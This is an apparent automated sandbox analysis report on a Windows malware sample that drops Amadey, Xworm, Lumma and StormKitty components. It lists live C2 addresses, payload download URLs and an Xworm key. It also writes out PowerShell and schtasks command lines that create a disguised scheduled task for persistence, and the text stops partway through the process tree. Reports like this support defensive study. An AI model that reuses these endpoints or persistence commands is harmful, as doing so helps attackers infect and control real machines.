Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
25-01-2025 16:01
Static task
static1
Behavioral task
behavioral1
Sample
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
Resource
win10v2004-20241007-en
General
-
Target
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
-
Size
1.8MB
-
MD5
79313fd19b4d3a947a4a5bb6d8a3e719
-
SHA1
f89d8fd59723ca8e433fd10a69c12f1da208d69d
-
SHA256
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40
-
SHA512
35cdfe95ca8c7a8e51a636dcd1fdad96d319b933171d75df30dd52ff3f1b8720d6e1bacf6ca4352a7310b1711d111fe2da322e7a3a85f33fcaa42e8c79a62142
-
SSDEEP
49152:IonQDVTFz3+dBKJCLKwVP9fcaGrGZ2nePhUC/SdcY6NSesH:/Q9tjJCGwVF0aGCZ2enty
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
5.0
91.212.166.99:4404
f35pmRFzPiiasEf1
-
Install_directory
%LocalAppData%
-
install_file
dllhost.exe
Extracted
lumma
https://toppyneedus.biz/api
Signatures
-
Amadey family
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2716-218-0x0000000000410000-0x0000000000420000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/3012-968-0x0000000000260000-0x0000000000510000-memory.dmp healer behavioral1/memory/3012-969-0x0000000000260000-0x0000000000510000-memory.dmp healer -
Healer family
-
Lumma family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/2716-960-0x000000001CC30000-0x000000001CD50000-memory.dmp family_stormkitty -
Stormkitty family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ jonbDes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell and hide display window.
pid Process 2004 powershell.exe 2700 powershell.exe 2124 powershell.exe 2584 powershell.exe 2380 powershell.exe 2724 powershell.exe 1940 powershell.exe 2976 powershell.exe 936 powershell.exe 2692 powershell.exe 2988 powershell.exe 2988 powershell.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe 5 3028 skotes.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jonbDes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jonbDes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe -
Executes dropped EXE 12 IoCs
pid Process 3028 skotes.exe 1892 13Z5sqy.exe 2916 jonbDes.exe 2488 fok8xWd.exe 2368 IJWSn6z.exe 620 IJWSn6z.tmp 1700 IJWSn6z.exe 1616 IJWSn6z.tmp 3060 mH0mZDF.exe 2100 tYrnx75.exe 2436 UmN1TJS.exe 2148 Macromedia.com -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine jonbDes.exe -
Loads dropped DLL 24 IoCs
pid Process 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 3028 skotes.exe 3028 skotes.exe 3028 skotes.exe 3028 skotes.exe 3028 skotes.exe 3028 skotes.exe 2368 IJWSn6z.exe 620 IJWSn6z.tmp 620 IJWSn6z.tmp 620 IJWSn6z.tmp 620 IJWSn6z.tmp 1700 IJWSn6z.exe 1616 IJWSn6z.tmp 1616 IJWSn6z.tmp 1616 IJWSn6z.tmp 2408 regsvr32.exe 2716 regsvr32.exe 3028 skotes.exe 3028 skotes.exe 2100 tYrnx75.exe 3028 skotes.exe 2164 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" UmN1TJS.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 32 bitbucket.org 35 bitbucket.org 37 bitbucket.org 66 bitbucket.org 67 bitbucket.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a4a9-774.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2232 tasklist.exe 2152 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 3028 skotes.exe 2916 jonbDes.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1892 set thread context of 2412 1892 13Z5sqy.exe 45 -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\AttacksContacted tYrnx75.exe File created C:\Windows\Tasks\skotes.job f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe File opened for modification C:\Windows\SchedulesAb tYrnx75.exe File opened for modification C:\Windows\ContainsBefore tYrnx75.exe File opened for modification C:\Windows\TokenDetroit tYrnx75.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mH0mZDF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tYrnx75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Macromedia.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fok8xWd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2476 timeout.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 jonbDes.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a jonbDes.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a jonbDes.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 892 schtasks.exe 584 schtasks.exe 2972 schtasks.exe 1896 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 3028 skotes.exe 2916 jonbDes.exe 1616 IJWSn6z.tmp 1616 IJWSn6z.tmp 2716 regsvr32.exe 2692 powershell.exe 2988 powershell.exe 2716 regsvr32.exe 2584 powershell.exe 2716 regsvr32.exe 2380 powershell.exe 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeDebugPrivilege 2716 regsvr32.exe Token: SeDebugPrivilege 2152 tasklist.exe Token: SeDebugPrivilege 2232 tasklist.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2716 regsvr32.exe Token: SeDebugPrivilege 2380 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 1616 IJWSn6z.tmp 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2148 Macromedia.com 2148 Macromedia.com 2148 Macromedia.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2716 regsvr32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2108 wrote to memory of 3028 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 30 PID 2108 wrote to memory of 3028 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 30 PID 2108 wrote to memory of 3028 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 30 PID 2108 wrote to memory of 3028 2108 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 30 PID 3028 wrote to memory of 1892 3028 skotes.exe 32 PID 3028 wrote to memory of 1892 3028 skotes.exe 32 PID 3028 wrote to memory of 1892 3028 skotes.exe 32 PID 3028 wrote to memory of 1892 3028 skotes.exe 32 PID 3028 wrote to memory of 2916 3028 skotes.exe 33 PID 3028 wrote to memory of 2916 3028 skotes.exe 33 PID 3028 wrote to memory of 2916 3028 skotes.exe 33 PID 3028 wrote to memory of 2916 3028 skotes.exe 33 PID 3028 wrote to memory of 2488 3028 skotes.exe 34 PID 3028 wrote to memory of 2488 3028 skotes.exe 34 PID 3028 wrote to memory of 2488 3028 skotes.exe 34 PID 3028 wrote to memory of 2488 3028 skotes.exe 34 PID 3028 wrote to memory of 2368 3028 skotes.exe 35 PID 3028 wrote to memory of 2368 3028 skotes.exe 35 PID 3028 wrote to memory of 2368 3028 skotes.exe 35 PID 3028 wrote to memory of 2368 3028 skotes.exe 35 PID 3028 wrote to memory of 2368 3028 skotes.exe 35 PID 3028 wrote to memory of 2368 3028 skotes.exe 35 PID 3028 wrote to memory of 2368 3028 skotes.exe 35 PID 2368 wrote to memory of 620 2368 IJWSn6z.exe 36 PID 2368 wrote to memory of 620 2368 IJWSn6z.exe 36 PID 2368 wrote to memory of 620 2368 IJWSn6z.exe 36 PID 2368 wrote to memory of 620 2368 IJWSn6z.exe 36 PID 2368 wrote to memory of 620 2368 IJWSn6z.exe 36 PID 2368 wrote to memory of 620 2368 IJWSn6z.exe 36 PID 2368 wrote to memory of 620 2368 IJWSn6z.exe 36 PID 620 wrote to memory of 1700 620 IJWSn6z.tmp 37 PID 620 wrote to memory of 1700 620 IJWSn6z.tmp 37 PID 620 wrote to memory of 1700 620 IJWSn6z.tmp 37 PID 620 wrote to memory of 1700 620 IJWSn6z.tmp 37 PID 620 wrote to memory of 1700 620 IJWSn6z.tmp 37 PID 620 wrote to memory of 1700 620 IJWSn6z.tmp 37 PID 620 wrote to memory of 1700 620 IJWSn6z.tmp 37 PID 1700 wrote to memory of 1616 1700 IJWSn6z.exe 38 PID 1700 wrote to memory of 1616 1700 IJWSn6z.exe 38 PID 1700 wrote to memory of 1616 1700 IJWSn6z.exe 38 PID 1700 wrote to memory of 1616 1700 IJWSn6z.exe 38 PID 1700 wrote to memory of 1616 1700 IJWSn6z.exe 38 PID 1700 wrote to memory of 1616 1700 IJWSn6z.exe 38 PID 1700 wrote to memory of 1616 1700 IJWSn6z.exe 38 PID 1616 wrote to memory of 2408 1616 IJWSn6z.tmp 39 PID 1616 wrote to memory of 2408 1616 IJWSn6z.tmp 39 PID 1616 wrote to memory of 2408 1616 IJWSn6z.tmp 39 PID 1616 wrote to memory of 2408 1616 IJWSn6z.tmp 39 PID 1616 wrote to memory of 2408 1616 IJWSn6z.tmp 39 PID 1616 wrote to memory of 2408 1616 IJWSn6z.tmp 39 PID 1616 wrote to memory of 2408 1616 IJWSn6z.tmp 39 PID 2408 wrote to memory of 2716 2408 regsvr32.exe 40 PID 2408 wrote to memory of 2716 2408 regsvr32.exe 40 PID 2408 wrote to memory of 2716 2408 regsvr32.exe 40 PID 2408 wrote to memory of 2716 2408 regsvr32.exe 40 PID 2408 wrote to memory of 2716 2408 regsvr32.exe 40 PID 2408 wrote to memory of 2716 2408 regsvr32.exe 40 PID 2408 wrote to memory of 2716 2408 regsvr32.exe 40 PID 2716 wrote to memory of 2692 2716 regsvr32.exe 41 PID 2716 wrote to memory of 2692 2716 regsvr32.exe 41 PID 2716 wrote to memory of 2692 2716 regsvr32.exe 41 PID 2716 wrote to memory of 2988 2716 regsvr32.exe 43 PID 2716 wrote to memory of 2988 2716 regsvr32.exe 43 PID 2716 wrote to memory of 2988 2716 regsvr32.exe 43 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe"C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1892 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2412
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2488
-
-
C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\is-UM7FL.tmp\IJWSn6z.tmp"C:\Users\Admin\AppData\Local\Temp\is-UM7FL.tmp\IJWSn6z.tmp" /SL5="$C0156,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\is-4VUUU.tmp\IJWSn6z.tmp"C:\Users\Admin\AppData\Local\Temp\is-4VUUU.tmp\IJWSn6z.tmp" /SL5="$5022E,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\system32\regsvr32.exe/s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{48011397-2C23-4196-8BAE-46145F3E5FF1}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dllhost" /tr "C:\Users\Admin\AppData\Local\dllhost.exe"9⤵
- Scheduled Task/Job: Scheduled Task
PID:892
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3060 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
